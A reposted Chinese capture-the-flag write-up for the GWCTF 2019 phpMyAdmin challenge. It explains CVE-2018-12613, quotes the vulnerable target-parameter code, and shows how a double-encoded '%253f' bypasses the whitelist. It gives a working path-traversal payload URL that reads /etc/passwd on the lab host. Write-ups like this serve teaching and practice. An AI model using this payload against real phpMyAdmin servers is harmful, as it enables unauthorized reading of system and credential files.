码迷,mamicode.com
首页 > 数据库 > 详细

[GWCTF 2019]我有一个数据库

时间:2020-07-12 20:46:39      阅读:92      评论:0      收藏:0      [点我收藏+]

标签:相关   amp   passwd   match   eva   包含漏洞   一个数据库   文件包含漏洞   static   

该题考查cve-2018-12613-PhpMyadmin后台文件包含漏洞
使用御剑进行扫描发现phpmyadmin/目录,无需密码便可以进入
查看相关版本信息

技术图片

 

 

  百度一下发现phpmyadmin4.8.1版本文件包含漏洞,问题出在index.php的target参数位置

// If we have a valid target, let‘s load that script instead
if (! empty($_REQUEST[‘target‘])
    && is_string($_REQUEST[‘target‘])
    && ! preg_match(‘/^index/‘, $_REQUEST[‘target‘])
    && ! in_array($_REQUEST[‘target‘], $target_blacklist)
    && Core::checkPageValidity($_REQUEST[‘target‘])
) {
    include $_REQUEST[‘target‘];
    exit;
}

$target_blacklist,target参数黑名单

$target_blacklist = array (
    ‘import.php‘, ‘export.php‘
);

Core::checkPageValidity($_REQUEST[‘target‘]),Core类参数校验方法

 1  public static function checkPageValidity(&$page, array $whitelist = [])
 2     {
 3         if (empty($whitelist)) {
 4             $whitelist = self::$goto_whitelist;
 5         }
 6         if (! isset($page) || !is_string($page)) {
 7             return false;
 8         }
 9 
10         if (in_array($page, $whitelist)) {
11             return true;
12         }
13 
14         $_page = mb_substr(
15             $page,
16             0,
17             mb_strpos($page . ‘?‘, ‘?‘)
18         );
19         if (in_array($_page, $whitelist)) {
20             return true;
21         }
22 
23         $_page = urldecode($page);
24         $_page = mb_substr(
25             $_page,
26             0,
27             mb_strpos($_page . ‘?‘, ‘?‘)
28         );
29         if (in_array($_page, $whitelist)) {
30             return true;
31         }
32 
33         return false;
34     }

问题在于第23行的urldecode($page)方法,存在二次编码绕过

$_page = urldecode($page);
%25的url编码为%
%3f的url编码为?
%253f-->?

payLoad:
这里target参数只要不是黑名单中php文件就可以

http://725a4060-e628-4f9f-801a-e96075cbfca8.node3.buuoj.cn/phpmyadmin/index.php?target=db_datadict.php%253f../../../../../../etc/passwd

技术图片

 

 flag应该位于系统的根目录

技术图片

 

 

[GWCTF 2019]我有一个数据库

标签:相关   amp   passwd   match   eva   包含漏洞   一个数据库   文件包含漏洞   static   

原文地址:https://www.cnblogs.com/gtx690/p/13289555.html
(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
分享档案
更多>
2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)
周排行
mamicode.com排行更多图片
更多
友情链接
兰亭集智   国之画   百度统计   站长统计   阿里云   chrome插件   新版天听网
关于我们 - 联系我们 - 留言反馈
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!